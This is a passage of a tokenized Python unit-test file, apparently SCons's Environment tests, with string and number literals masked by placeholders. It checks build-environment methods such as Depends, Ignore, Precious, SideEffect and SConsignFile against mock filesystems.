<EOL> finally : <EOL> os . chdir ( save ) <EOL> def test_Depends ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> t = env . Depends ( target = '<STR_LIT>' , <EOL> dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . depends ) == <NUM_LIT:1> <EOL> d = t . depends [ <NUM_LIT:0> ] <EOL> assert d . __class__ . __name__ == '<STR_LIT>' , d . __class__ . __name__ <EOL> assert d . path == '<STR_LIT>' <EOL> t = env . Depends ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . depends ) == <NUM_LIT:1> <EOL> d = t . depends [ <NUM_LIT:0> ] <EOL> assert d . __class__ . __name__ == '<STR_LIT>' , d . __class__ . __name__ <EOL> assert d . path == '<STR_LIT>' <EOL> t = env . Depends ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . depends ) == <NUM_LIT:1> <EOL> d = t . depends [ <NUM_LIT:0> ] <EOL> assert d . __class__ . __name__ == '<STR_LIT>' , d . __class__ . __name__ <EOL> assert d . path == '<STR_LIT>' <EOL> def test_Dir ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def Dir ( self , name ) : <EOL> return '<STR_LIT>' % name <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> d = env . Dir ( '<STR_LIT:d>' ) <EOL> assert d == '<STR_LIT>' , d <EOL> d = env . Dir ( '<STR_LIT>' ) <EOL> assert d == '<STR_LIT>' , d <EOL> d = env . Dir ( '<STR_LIT>' ) <EOL> assert d == '<STR_LIT>' , d <EOL> d = env . Dir ( [ '<STR_LIT>' ] ) <EOL> assert d == [ '<STR_LIT>' ] , d <EOL> d = env . Dir ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert d == [ '<STR_LIT>' , '<STR_LIT>' ] , d <EOL> def test_NoClean ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> t = env . NoClean ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> assert t [ <NUM_LIT:0> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:0> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:0> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:0> ] . noclean <EOL> assert t [ <NUM_LIT:1> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:1> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:1> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:1> ] . noclean <EOL> assert t [ <NUM_LIT:2> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:2> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:2> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:2> ] . noclean <EOL> assert t [ <NUM_LIT:3> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:3> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:3> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:3> ] . noclean <EOL> assert t [ <NUM_LIT:4> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:4> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:4> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:4> ] . noclean <EOL> def test_Dump ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT:foo>' ) <EOL> assert env . Dump ( '<STR_LIT>' ) == "<STR_LIT>" , env . Dump ( '<STR_LIT>' ) <EOL> assert len ( env . Dump ( ) ) > <NUM_LIT:200> , env . Dump ( ) <EOL> def test_Environment ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> e2 = env . Environment ( X = '<STR_LIT>' , Y = '<STR_LIT>' ) <EOL> assert e2 [ '<STR_LIT:X>' ] == '<STR_LIT>' , e2 [ '<STR_LIT:X>' ] <EOL> assert e2 [ '<STR_LIT:Y>' ] == '<STR_LIT>' , e2 [ '<STR_LIT:Y>' ] <EOL> def test_Execute ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyAction : <EOL> def __init__ ( self , * args , ** kw ) : <EOL> self . args = args <EOL> def __call__ ( self , target , source , env ) : <EOL> return "<STR_LIT>" % self . args <EOL> env = Environment ( ) <EOL> env . Action = MyAction <EOL> result = env . Execute ( "<STR_LIT:foo>" ) <EOL> assert result == "<STR_LIT>" , result <EOL> def test_Entry ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def Entry ( self , name ) : <EOL> return '<STR_LIT>' % name <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> e = env . Entry ( '<STR_LIT:e>' ) <EOL> assert e == '<STR_LIT>' , e <EOL> e = env . Entry ( '<STR_LIT>' ) <EOL> assert e == '<STR_LIT>' , e <EOL> e = env . Entry ( '<STR_LIT>' ) <EOL> assert e == '<STR_LIT>' , e <EOL> e = env . Entry ( [ '<STR_LIT>' ] ) <EOL> assert e == [ '<STR_LIT>' ] , e <EOL> e = env . Entry ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert e == [ '<STR_LIT>' , '<STR_LIT>' ] , e <EOL> def test_File ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def File ( self , name ) : <EOL> return '<STR_LIT>' % name <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> f = env . File ( '<STR_LIT:f>' ) <EOL> assert f == '<STR_LIT>' , f <EOL> f = env . File ( '<STR_LIT>' ) <EOL> assert f == '<STR_LIT>' , f <EOL> f = env . File ( '<STR_LIT>' ) <EOL> assert f == '<STR_LIT>' , f <EOL> f = env . File ( [ '<STR_LIT>' ] ) <EOL> assert f == [ '<STR_LIT>' ] , f <EOL> f = env . File ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert f == [ '<STR_LIT>' , '<STR_LIT>' ] , f <EOL> def test_FindFile ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> r = env . FindFile ( '<STR_LIT:foo>' , [ '<STR_LIT>' ] ) <EOL> assert r is None , r <EOL> def test_Flatten ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> l = env . Flatten ( [ <NUM_LIT:1> ] ) <EOL> assert l == [ <NUM_LIT:1> ] <EOL> l = env . Flatten ( [ <NUM_LIT:1> , [ <NUM_LIT:2> , [ <NUM_LIT:3> , [ <NUM_LIT:4> ] ] ] ] ) <EOL> assert l == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , l <EOL> def test_GetBuildPath ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( MAGIC = '<STR_LIT>' ) <EOL> p = env . GetBuildPath ( '<STR_LIT:foo>' ) <EOL> assert p == '<STR_LIT:foo>' , p <EOL> p = env . GetBuildPath ( '<STR_LIT>' ) <EOL> assert p == '<STR_LIT>' , p <EOL> def test_Ignore ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> t = env . Ignore ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . ignore ) == <NUM_LIT:1> <EOL> i = t . ignore [ <NUM_LIT:0> ] <EOL> assert i . __class__ . __name__ == '<STR_LIT>' , i . __class__ . __name__ <EOL> assert i . path == '<STR_LIT>' <EOL> t = env . Ignore ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . ignore ) == <NUM_LIT:1> <EOL> i = t . ignore [ <NUM_LIT:0> ] <EOL> assert i . __class__ . __name__ == '<STR_LIT>' , i . __class__ . __name__ <EOL> assert i . path == '<STR_LIT>' <EOL> t = env . Ignore ( target = '<STR_LIT>' , dependency = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . __class__ . __name__ == '<STR_LIT>' , t . __class__ . __name__ <EOL> assert t . path == '<STR_LIT>' <EOL> assert len ( t . ignore ) == <NUM_LIT:1> <EOL> i = t . ignore [ <NUM_LIT:0> ] <EOL> assert i . __class__ . __name__ == '<STR_LIT>' , i . __class__ . __name__ <EOL> assert i . path == '<STR_LIT>' <EOL> def test_Literal ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> list = env . subst_list ( [ env . Literal ( '<STR_LIT>' ) , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert list == [ '<STR_LIT>' , '<STR_LIT>' ] , list <EOL> list = env . subst_list ( [ '<STR_LIT>' , env . Literal ( '<STR_LIT>' ) ] ) [ <NUM_LIT:0> ] <EOL> assert list == [ '<STR_LIT>' , '<STR_LIT>' ] , list <EOL> def test_Local ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' ) <EOL> l = env . Local ( env . fs . File ( '<STR_LIT>' ) ) <EOL> assert str ( l [ <NUM_LIT:0> ] ) == '<STR_LIT>' , l [ <NUM_LIT:0> ] <EOL> l = env . Local ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert str ( l [ <NUM_LIT:0> ] ) == '<STR_LIT>' , l [ <NUM_LIT:0> ] <EOL> assert str ( l [ <NUM_LIT:1> ] ) == '<STR_LIT>' , l [ <NUM_LIT:1> ] <EOL> def test_Precious ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> t = env . Precious ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> assert t [ <NUM_LIT:0> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:0> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:0> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:0> ] . precious <EOL> assert t [ <NUM_LIT:1> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:1> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:1> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:1> ] . precious <EOL> assert t [ <NUM_LIT:2> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:2> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:2> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:2> ] . precious <EOL> assert t [ <NUM_LIT:3> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:3> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:3> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:3> ] . precious <EOL> assert t [ <NUM_LIT:4> ] . __class__ . __name__ == '<STR_LIT>' , t [ <NUM_LIT:4> ] . __class__ . __name__ <EOL> assert t [ <NUM_LIT:4> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:4> ] . precious <EOL> def test_Repository ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def __init__ ( self ) : <EOL> self . list = [ ] <EOL> def Repository ( self , * dirs ) : <EOL> self . list . extend ( list ( dirs ) ) <EOL> def Dir ( self , name ) : <EOL> return name <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> env . Repository ( '<STR_LIT>' ) <EOL> env . Repository ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> expect = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert env . fs . list == expect , env . fs . list <EOL> def test_Scanner ( self ) : <EOL> """<STR_LIT>""" <EOL> def scan ( node , env , target , arg ) : <EOL> pass <EOL> env = self . TestEnvironment ( FOO = scan ) <EOL> s = env . Scanner ( '<STR_LIT:foo>' ) <EOL> assert not s is None , s <EOL> s = env . Scanner ( function = '<STR_LIT:foo>' ) <EOL> assert not s is None , s <EOL> if <NUM_LIT:0> : <EOL> s = env . Scanner ( '<STR_LIT>' ) <EOL> assert not s is None , s <EOL> s = env . Scanner ( function = '<STR_LIT>' ) <EOL> assert not s is None , s <EOL> def test_SConsignFile ( self ) : <EOL> """<STR_LIT>""" <EOL> import SCons . SConsign <EOL> class MyFS : <EOL> SConstruct_dir = os . sep + '<STR_LIT>' <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , <EOL> BAR = os . path . join ( os . sep , '<STR_LIT>' ) ) <EOL> env . fs = MyFS ( ) <EOL> env . Execute = lambda action : None <EOL> try : <EOL> fnames = [ ] <EOL> dbms = [ ] <EOL> def capture ( name , dbm_module , fnames = fnames , dbms = dbms ) : <EOL> fnames . append ( name ) <EOL> dbms . append ( dbm_module ) <EOL> save_SConsign_File = SCons . SConsign . File <EOL> SCons . SConsign . File = capture <EOL> env . SConsignFile ( '<STR_LIT:foo>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' , '<STR_LIT:foo>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( '<STR_LIT>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' , '<STR_LIT>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( '<STR_LIT>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . sep + '<STR_LIT>' , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( os . sep + '<STR_LIT>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . sep + '<STR_LIT>' , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( '<STR_LIT>' , '<STR_LIT:x>' ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == '<STR_LIT:x>' , dbms <EOL> env . SConsignFile ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == <NUM_LIT:7> , dbms <EOL> env . SConsignFile ( ) <EOL> assert fnames [ - <NUM_LIT:1> ] == os . path . join ( os . sep , '<STR_LIT>' , '<STR_LIT>' ) , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> env . SConsignFile ( None ) <EOL> assert fnames [ - <NUM_LIT:1> ] == None , fnames <EOL> assert dbms [ - <NUM_LIT:1> ] == None , dbms <EOL> finally : <EOL> SCons . SConsign . File = save_SConsign_File <EOL> def test_SideEffect ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( LIB = '<STR_LIT>' , FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . File ( '<STR_LIT>' ) <EOL> env . Dir ( '<STR_LIT>' ) <EOL> foo = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> bar = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = env . SideEffect ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert s . __class__ . __name__ == '<STR_LIT>' , s . __class__ . __name__ <EOL> assert s . path == '<STR_LIT>' <EOL> assert s . side_effect <EOL> assert foo . side_effects == [ s ] <EOL> assert bar . side_effects == [ s ] <EOL> fff = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> bbb = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = env . SideEffect ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert s . __class__ . __name__ == '<STR_LIT>' , s . __class__ . __name__ <EOL> assert s . path == '<STR_LIT>' <EOL> assert s . side_effect <EOL> assert fff . side_effects == [ s ] , fff . side_effects <EOL> assert bbb . side_effects == [ s ] , bbb . side_effects <EOL> ggg = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> ccc = env . Object ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = env . SideEffect ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert s . __class__ . __name__ == '<STR_LIT>' , s . __class__ . __name__ <EOL> assert s . path == '<STR_LIT>' <EOL> assert s . side_effect <EOL> assert ggg . side_effects == [ s ] , ggg . side_effects <EOL> assert ccc . side_effects == [ s ] , ccc . side_effects <EOL> def test_SourceCode ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> e = env . SourceCode ( '<STR_LIT:foo>' , None ) [ <NUM_LIT:0> ] <EOL> assert e . path == '<STR_LIT:foo>' <EOL> s = e . src_builder ( ) <EOL> assert s is None , s <EOL> b = Builder ( ) <EOL> e = env . SourceCode ( e , b ) [ <NUM_LIT:0> ] <EOL> assert e . path == '<STR_LIT:foo>' <EOL> s = e . src_builder ( ) <EOL> assert s is b , s <EOL> e = env . SourceCode ( '<STR_LIT>' , None ) [ <NUM_LIT:0> ] <EOL> assert e . path == '<STR_LIT>' <EOL> s = e . src_builder ( ) <EOL> assert s is None , s <EOL> def test_SourceSignatures ( type ) : <EOL> """<STR_LIT>""" <EOL> import SCons . Errors <EOL> env = type . TestEnvironment ( M = '<STR_LIT>' , T = '<STR_LIT>' ) <EOL> exc_caught = None <EOL> try : <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> assert env . src_sig_type == '<STR_LIT>' , env . src_sig_type <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> assert env . src_sig_type == '<STR_LIT>' , env . src_sig_type <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> assert env . src_sig_type == '<STR_LIT>' , env . src_sig_type <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> assert env . src_sig_type == '<STR_LIT>' , env . src_sig_type <EOL> try : <EOL> import SCons . Util <EOL> save_md5 = SCons . Util . md5 <EOL> SCons . Util . md5 = None <EOL> try : <EOL> env . SourceSignatures ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> finally : <EOL> SCons . Util . md5 = save_md5 <EOL> def test_Split ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> s = env . Split ( "<STR_LIT>" ) <EOL> assert s == [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] , s <EOL> s = env . Split ( "<STR_LIT>" ) <EOL> assert s == [ "<STR_LIT>" , "<STR_LIT:bar>" ] , s <EOL> s = env . Split ( [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] ) <EOL> assert s == [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] , s <EOL> s = env . Split ( [ "<STR_LIT:foo>" , "<STR_LIT>" ] ) <EOL> assert s == [ "<STR_LIT:foo>" , "<STR_LIT>" ] , s <EOL> s = env . Split ( "<STR_LIT:foo>" ) <EOL> assert s == [ "<STR_LIT:foo>" ] , s <EOL> s = env . Split ( "<STR_LIT>" ) <EOL> assert s == [ "<STR_LIT>" ] , s <EOL> def test_TargetSignatures ( type ) : <EOL> """<STR_LIT>""" <EOL> import SCons . Errors <EOL> env = type . TestEnvironment ( B = '<STR_LIT>' , C = '<STR_LIT:content>' ) <EOL> exc_caught = None <EOL> try : <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> assert not hasattr ( env , '<STR_LIT>' ) <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT:content>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT:content>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT:content>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT>' , env . tgt_sig_type <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> assert env . tgt_sig_type == '<STR_LIT>' , env . tgt_sig_type <EOL> try : <EOL> import SCons . Util <EOL> save_md5 = SCons . Util . md5 <EOL> SCons . Util . md5 = None <EOL> try : <EOL> env . TargetSignatures ( '<STR_LIT>' ) <EOL> except SCons . Errors . UserError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> try : <EOL> env . TargetSignatures ( '<STR_LIT:content>' ) <EOL> except SCons . Errors . UserError : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> finally : <EOL> SCons . Util . md5 = save_md5 <EOL> def test_Value ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> v1 = env . Value ( '<STR_LIT:a>' ) <EOL> assert v1 . value == '<STR_LIT:a>' , v1 . value <EOL> value2 = '<STR_LIT:a>' <EOL> v2 = env . Value ( value2 ) <EOL> assert v2 . value == value2 , v2 . value <EOL> assert v2 . value is value2 , v2 . value <EOL> assert not v1 is v2 <EOL> assert v1 . value == v2 . value <EOL> v3 = env . Value ( '<STR_LIT:c>' , '<STR_LIT>' ) <EOL> assert v3 . value == '<STR_LIT:c>' , v3 . value <EOL> def test_Environment_global_variable ( type ) : <EOL> """<STR_LIT>""" <EOL> class MyEnv ( SCons . Environment . Base ) : <EOL> def xxx ( self , string ) : <EOL> return self . subst ( string ) <EOL> SCons . Environment . Environment = MyEnv <EOL> env = SCons . Environment . Environment ( FOO = '<STR_LIT:foo>' ) <EOL> f = env . subst ( '<STR_LIT>' ) <EOL> assert f == '<STR_LIT:foo>' , f <EOL> f = env . xxx ( '<STR_LIT>' ) <EOL> assert f == '<STR_LIT:foo>' , f <EOL> def test_bad_keywords ( self ) : <EOL> """<STR_LIT>""" <EOL> added = [ ] <EOL> env = self . TestEnvironment ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> INIT = '<STR_LIT>' ) <EOL> bad_msg = '<STR_LIT>' <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . Append ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> APPEND = '<STR_LIT>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . AppendUnique ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> APPENDUNIQUE = '<STR_LIT>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . Prepend ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> PREPEND = '<STR_LIT>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . Prepend ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> PREPENDUNIQUE = '<STR_LIT>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> env . Replace ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> REPLACE = '<STR_LIT:replace>' ) <EOL> added . append ( '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not env . has_key ( x ) , env [ x ] <EOL> for x in added : <EOL> assert env . has_key ( x ) , bad_msg % x <EOL> copy = env . Clone ( TARGETS = '<STR_LIT>' , <EOL> SOURCES = '<STR_LIT>' , <EOL> SOURCE = '<STR_LIT:source>' , <EOL> TARGET = '<STR_LIT:target>' , <EOL> CHANGED_SOURCES = '<STR_LIT>' , <EOL> CHANGED_TARGETS = '<STR_LIT>' , <EOL> UNCHANGED_SOURCES = '<STR_LIT>' , <EOL> UNCHANGED_TARGETS = '<STR_LIT>' , <EOL> COPY = '<STR_LIT>' ) <EOL> for x in self . reserved_variables : <EOL> assert not copy . has_key ( x ) , env [ x ] <EOL> for x in added + [ '<STR_LIT>' ] : <EOL> assert copy . has_key ( x ) , bad_msg % x <EOL> over = env . Override ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> 